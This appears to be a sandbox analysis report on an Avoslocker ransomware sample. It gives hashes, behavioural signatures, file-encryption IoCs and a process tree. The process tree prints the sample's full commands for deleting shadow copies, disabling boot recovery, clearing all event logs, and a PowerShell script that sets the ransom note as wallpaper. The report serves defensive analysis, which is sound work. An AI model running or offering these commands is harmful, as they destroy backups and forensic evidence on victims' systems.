Analysis
- max time kernel: 94s
- max time network: 16s
- platform: windows7_x64
- resource: win7-20240729-en
- resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
- submitted: 15-12-2024 00:10
Static task
static1
Behavioral task
behavioral1
Sample
ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe
Resource
win10v2004-20241007-en
General
- Target: ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe
- Size: 807KB
- MD5: e27b5291c8fb2dfdeb7f16bb6851df5e
- SHA1: 40207f83b601cd60905c1f807ac0889c80dfe33f
- SHA256: ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f
- SHA512: 2ddbc50cd780ffbf73c354b9b437322eb49cb05bb6f287d54e7dcafb61dc4c4549e37ae2f972f3d240bfa7d2ca485b7583137f1bf038bc901f378cea0c305c6a
- SSDEEP: 12288:0Z4s3rg9u/2/oT+NXtHLlP/O+OeO+OeNhBBhhBBAtHg9rjI+LXJ0ivlzkHBDsYAG:u4s+oT+NXBLi0rjFXvyHBlbmCZa8
Malware Config
Signatures
- Avoslocker Ransomware
  Avoslocker is a relatively new ransomware that was observed in late June and early July 2021.
- Avoslocker family
- Deletes shadow copies (3 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
  pid   Process
  1368  bcdedit.exe
  3056  bcdedit.exe
- Renames multiple (10398) files with added filename extension
  This suggests ransomware activity of encrypting all the files on the system.
- Drops desktop.ini file(s) (1 IoCs)
  description                   ioc                                                                             Process
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe
- Enumerates connected drives (3 TTPs, 1 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  description              ioc     Process
  File opened (read-only)  \??\Z:  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe
- Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  description      ioc                                                                                                                                                      Process
  Set value (str)  \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1641778529.png"  reg.exe
- Drops file in Program Files directory (64 IoCs)
  Process (all rows): ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe
  description                   ioc
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR36F.GIF
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105496.WMF
  File opened for modification  C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider_right.png
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_zh_CN.jar
  File created                  C:\Program Files (x86)\MSBuild\Microsoft\GET_YOUR_FILES_BACK.txt
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\OLMAIL.FAE
  File opened for modification  C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18197_.WMF
  File opened for modification  C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\16.png
  File opened for modification  C:\Program Files\7-Zip\Lang\vi.txt
  File opened for modification  C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up.png
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIcon.jpg
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME38.CSS
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02617_.WMF
  File opened for modification  C:\Program Files\Java\jre7\lib\zi\Europe\Brussels
  File opened for modification  C:\Program Files\Java\jre7\lib\zi\America\Nome
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_ja_4.4.0.v20140623020002.jar
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar
  File opened for modification  C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip
  File opened for modification  C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\whitemenu.png
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montreal
  File opened for modification  C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14882_.GIF
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287417.WMF
  File opened for modification  C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\css\cpu.css
  File opened for modification  C:\Program Files\Windows Media Player\it-IT\WMPDMCCore.dll.mui
  File created                  C:\Program Files\VideoLAN\VLC\plugins\access_output\GET_YOUR_FILES_BACK.txt
  File created                  C:\Program Files\VideoLAN\VLC\locale\nn\GET_YOUR_FILES_BACK.txt
  File opened for modification  C:\Program Files\Java\jre7\lib\zi\Asia\Srednekolymsk
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\REMINDER.WAV
  File created                  C:\Program Files\7-Zip\Lang\GET_YOUR_FILES_BACK.txt
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Rangoon
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Document Themes 14\Origin.thmx
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0153516.WMF
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01130_.WMF
  File opened for modification  C:\Program Files\Windows Media Player\Media Renderer\DMR_120.png
  File created                  C:\Program Files\Microsoft Games\Multiplayer\Backgammon\fr-FR\GET_YOUR_FILES_BACK.txt
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL016.XML
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00204_.WMF
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187825.WMF
  File opened for modification  C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX8.x3d
  File opened for modification  C:\Program Files\Windows Journal\de-DE\jnwdui.dll.mui
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santiago
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME30.CSS
  File opened for modification  C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\highDpiImageSwap.js
  File opened for modification  C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_rainy.png
  File opened for modification  C:\Program Files\DVD Maker\es-ES\OmdProject.dll.mui
  File opened for modification  C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui
  File opened for modification  C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\FlickLearningWizard.exe.mui
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Apothecary.eftx
  File opened for modification  C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0233070.WMF
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00555_.WMF
  File opened for modification  C:\Program Files\Windows Journal\es-ES\jnwmon.dll.mui
  File opened for modification  C:\Program Files\Java\jre7\lib\zi\MET
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml
  File created                  C:\Program Files\Internet Explorer\fr-FR\GET_YOUR_FILES_BACK.txt
  File opened for modification  C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\it-IT\calendar.html
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107512.WMF
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02446_.WMF
  File opened for modification  C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\css\settings.css
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\license.html
  File opened for modification  C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ja-jp-sym.xml
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Austin.xml
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIcons.jpg
  File created                  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\GET_YOUR_FILES_BACK.txt
- Command and Scripting Interpreter: PowerShell (signature name absent from the extracted page; taken from the process tree tags on PIDs 2364 and 6272)
  pid   Process
  2364  powershell.exe
  6272  powershell.exe
- System Location Discovery: System Language Discovery (1 TTPs, 1 IoCs)
  Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                          Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe
- Interacts with shadow copies (3 TTPs, 1 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  pid   Process
  1432  vssadmin.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid   Process
  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe
  2364  powershell.exe
  6272  powershell.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  description                          pid   Process
  Token: SeTakeOwnershipPrivilege      1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe
  Token: SeIncreaseQuotaPrivilege      2220  WMIC.exe
  Token: SeSecurityPrivilege           2220  WMIC.exe
  Token: SeTakeOwnershipPrivilege      2220  WMIC.exe
  Token: SeLoadDriverPrivilege         2220  WMIC.exe
  Token: SeSystemProfilePrivilege      2220  WMIC.exe
  Token: SeSystemtimePrivilege         2220  WMIC.exe
  Token: SeProfSingleProcessPrivilege  2220  WMIC.exe
  Token: SeIncBasePriorityPrivilege    2220  WMIC.exe
  Token: SeCreatePagefilePrivilege     2220  WMIC.exe
  Token: SeBackupPrivilege             2220  WMIC.exe
  Token: SeRestorePrivilege            2220  WMIC.exe
  Token: SeShutdownPrivilege           2220  WMIC.exe
  Token: SeDebugPrivilege              2220  WMIC.exe
  Token: SeSystemEnvironmentPrivilege  2220  WMIC.exe
  Token: SeRemoteShutdownPrivilege     2220  WMIC.exe
  Token: SeUndockPrivilege             2220  WMIC.exe
  Token: SeManageVolumePrivilege       2220  WMIC.exe
  Token: 33                            2220  WMIC.exe
  Token: 34                            2220  WMIC.exe
  Token: 35                            2220  WMIC.exe
  Token: SeDebugPrivilege              2364  powershell.exe
  Token: SeIncreaseQuotaPrivilege      2220  WMIC.exe
  Token: SeSecurityPrivilege           2220  WMIC.exe
  Token: SeTakeOwnershipPrivilege      2220  WMIC.exe
  Token: SeLoadDriverPrivilege         2220  WMIC.exe
  Token: SeSystemProfilePrivilege      2220  WMIC.exe
  Token: SeSystemtimePrivilege         2220  WMIC.exe
  Token: SeProfSingleProcessPrivilege  2220  WMIC.exe
  Token: SeIncBasePriorityPrivilege    2220  WMIC.exe
  Token: SeCreatePagefilePrivilege     2220  WMIC.exe
  Token: SeBackupPrivilege             2220  WMIC.exe
  Token: SeRestorePrivilege            2220  WMIC.exe
  Token: SeShutdownPrivilege           2220  WMIC.exe
  Token: SeDebugPrivilege              2220  WMIC.exe
  Token: SeSystemEnvironmentPrivilege  2220  WMIC.exe
  Token: SeRemoteShutdownPrivilege     2220  WMIC.exe
  Token: SeUndockPrivilege             2220  WMIC.exe
  Token: SeManageVolumePrivilege       2220  WMIC.exe
  Token: 33                            2220  WMIC.exe
  Token: 34                            2220  WMIC.exe
  Token: 35                            2220  WMIC.exe
  Token: SeBackupPrivilege             2364  powershell.exe
  Token: SeSecurityPrivilege           2364  powershell.exe
  Token: SeBackupPrivilege             2364  powershell.exe
  Token: SeBackupPrivilege             2364  powershell.exe
  Token: SeSecurityPrivilege           2364  powershell.exe
  Token: SeBackupPrivilege             2364  powershell.exe
  Token: SeBackupPrivilege             2364  powershell.exe
  Token: SeSecurityPrivilege           2364  powershell.exe
  Token: SeBackupPrivilege             2364  powershell.exe
  Token: SeBackupPrivilege             2364  powershell.exe
  Token: SeSecurityPrivilege           2364  powershell.exe
  Token: SeBackupPrivilege             2364  powershell.exe
  Token: SeBackupPrivilege             2364  powershell.exe
  Token: SeSecurityPrivilege           2364  powershell.exe
  Token: SeBackupPrivilege             2364  powershell.exe
  Token: SeBackupPrivilege             2364  powershell.exe
  Token: SeSecurityPrivilege           2364  powershell.exe
  Token: SeBackupPrivilege             6628  vssvc.exe
  Token: SeRestorePrivilege            6628  vssvc.exe
  Token: SeAuditPrivilege              6628  vssvc.exe
  Token: SeBackupPrivilege             2364  powershell.exe
  Token: SeSecurityPrivilege           2364  powershell.exe
- Suspicious use of WriteProcessMemory (45 IoCs)
  description                       pid   Process                                                                procid_target
  PID 1232 wrote to memory of 2380  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  31
  PID 1232 wrote to memory of 2380  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  31
  PID 1232 wrote to memory of 2380  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  31
  PID 1232 wrote to memory of 2380  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  31
  PID 1232 wrote to memory of 2452  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  32
  PID 1232 wrote to memory of 2452  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  32
  PID 1232 wrote to memory of 2452  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  32
  PID 1232 wrote to memory of 2452  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  32
  PID 1232 wrote to memory of 2320  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  33
  PID 1232 wrote to memory of 2320  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  33
  PID 1232 wrote to memory of 2320  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  33
  PID 1232 wrote to memory of 2320  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  33
  PID 1232 wrote to memory of 2888  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  34
  PID 1232 wrote to memory of 2888  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  34
  PID 1232 wrote to memory of 2888  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  34
  PID 1232 wrote to memory of 2888  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  34
  PID 1232 wrote to memory of 1436  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  35
  PID 1232 wrote to memory of 1436  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  35
  PID 1232 wrote to memory of 1436  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  35
  PID 1232 wrote to memory of 1436  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  35
  PID 2380 wrote to memory of 2220  2380  cmd.exe                                                                36
  PID 2380 wrote to memory of 2220  2380  cmd.exe                                                                36
  PID 2380 wrote to memory of 2220  2380  cmd.exe                                                                36
  PID 1436 wrote to memory of 2364  1436  cmd.exe                                                                37
  PID 1436 wrote to memory of 2364  1436  cmd.exe                                                                37
  PID 1436 wrote to memory of 2364  1436  cmd.exe                                                                37
  PID 2320 wrote to memory of 1368  2320  cmd.exe                                                                38
  PID 2320 wrote to memory of 1368  2320  cmd.exe                                                                38
  PID 2320 wrote to memory of 1368  2320  cmd.exe                                                                38
  PID 2888 wrote to memory of 3056  2888  cmd.exe                                                                39
  PID 2888 wrote to memory of 3056  2888  cmd.exe                                                                39
  PID 2888 wrote to memory of 3056  2888  cmd.exe                                                                39
  PID 2452 wrote to memory of 1432  2452  cmd.exe                                                                40
  PID 2452 wrote to memory of 1432  2452  cmd.exe                                                                40
  PID 2452 wrote to memory of 1432  2452  cmd.exe                                                                40
  PID 1232 wrote to memory of 6272  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  45
  PID 1232 wrote to memory of 6272  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  45
  PID 1232 wrote to memory of 6272  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  45
  PID 1232 wrote to memory of 6272  1232  ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe  45
  PID 6272 wrote to memory of 568   6272  powershell.exe                                                         46
  PID 6272 wrote to memory of 568   6272  powershell.exe                                                         46
  PID 6272 wrote to memory of 568   6272  powershell.exe                                                         46
  PID 6272 wrote to memory of 6900  6272  powershell.exe                                                         47
  PID 6272 wrote to memory of 6900  6272  powershell.exe                                                         47
  PID 6272 wrote to memory of 6900  6272  powershell.exe                                                         47
- Uses Volume Shadow Copy service COM API
  The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
- C:\Users\Admin\AppData\Local\Temp\ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe
  "C:\Users\Admin\AppData\Local\Temp\ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f.exe"
  - Drops desktop.ini file(s)
  - Enumerates connected drives
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1232
  - C:\Windows\system32\cmd.exe
    cmd /c wmic shadowcopy delete /nointeractive
    - Suspicious use of WriteProcessMemory
    PID:2380
    - C:\Windows\System32\Wbem\WMIC.exe
      wmic shadowcopy delete /nointeractive
      - Suspicious use of AdjustPrivilegeToken
      PID:2220
  - C:\Windows\system32\cmd.exe
    cmd /c vssadmin.exe Delete Shadows /All /Quiet
    - Suspicious use of WriteProcessMemory
    PID:2452
    - C:\Windows\system32\vssadmin.exe
      vssadmin.exe Delete Shadows /All /Quiet
      - Interacts with shadow copies
      PID:1432
  - C:\Windows\system32\cmd.exe
    cmd /c bcdedit /set {default} recoveryenabled No
    - Suspicious use of WriteProcessMemory
    PID:2320
    - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled No
      - Modifies boot configuration data using bcdedit
      PID:1368
  - C:\Windows\system32\cmd.exe
    cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
    - Suspicious use of WriteProcessMemory
    PID:2888
    - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} bootstatuspolicy ignoreallfailures
      - Modifies boot configuration data using bcdedit
      PID:3056
  - C:\Windows\system32\cmd.exe
    cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
    - Suspicious use of WriteProcessMemory
    PID:1436
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:2364
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$a = [System.IO.File]::ReadAllText(\"F:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:6272
    - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1641778529.png /f
      - Sets desktop wallpaper using registry
      PID:568
    - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
      PID:6900
- C:\Windows\system32\vssvc.exe
  C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  PID:6628
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Windows Management Instrumentation (1)
Defense Evasion
- Direct Volume Access (1)
- Indicator Removal (2)
  - File Deletion (2)
- Modify Registry (1)
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: d26f06f9ff6ae923f99f7e65baac2565
  SHA1: 1cdd3366268ae357338dddb5603c6905bd210dcf
  SHA256: 1e60912c6ca0dcf3aaa8f8fdcd6e640c5c15d8136682416ec8bef6b553e372a8
  SHA512: f9efd7a6040dd6563006ad5592d8d93687460c1640df3e7c6eddd920f6f51fc9a0f361fa38a12f352182a8e54a09816714cf92c26f4d0ee5f8c89e767ac4a214
- Filesize: 1011B
  MD5: c92c2b70fb37f84aab38412ad9226aa8
  SHA1: 14f2e9a83285612d0a7b2c83b8f89bccfde6c154
  SHA256: d64639e873c0873b469cd856d1ef4bce7dc14a80fac6fe2bed9d629f05acc77f
  SHA512: 04f9dcb3cd49909712535255b6eadd7fafcb2902bf1abd5a25e9bb5f5c4dc032611aec0a5b0ec89cd7dbc65276b935c54b906b391507d2e3e3aa65466b15f848